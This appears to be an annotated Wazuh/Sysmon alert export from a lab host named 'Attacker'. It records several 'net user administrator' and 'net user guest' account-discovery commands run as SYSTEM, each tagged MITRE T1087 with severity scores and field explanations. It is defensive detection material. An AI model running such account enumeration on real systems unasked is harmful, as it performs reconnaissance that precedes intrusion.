data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.390 ProcessGuid: {94294ddc-be63-680a-280c-000000000e00} ProcessId: 16124 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be63-680a-260c-000000000e00} ParentProcessId: 16356 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user administrator ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.390
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-280c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16124
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be63-680a-260c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:51.027+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:51.027+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534571.2291476
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.4548542Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291062
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.446 ProcessGuid: {94294ddc-be63-680a-290c-000000000e00} ProcessId: 10860 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.446
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-290c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10860
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:51.074+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:51.074+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534571.2296727
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.5556163Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291066
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.550 ProcessGuid: {94294ddc-be63-680a-2b0c-000000000e00} ProcessId: 10252 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be63-680a-290c-000000000e00} ParentProcessId: 10860 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user guest ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.550
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-2b0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be63-680a-290c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10860
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:51.220+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:51.220+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534571.2301808
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.6117639Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291075
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.603 ProcessGuid: {94294ddc-be63-680a-2c0c-000000000e00} ProcessId: 8956 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.603
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-2c0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8956
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:51.639+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:51.639+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534571.2307087
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.7162743Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291105
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

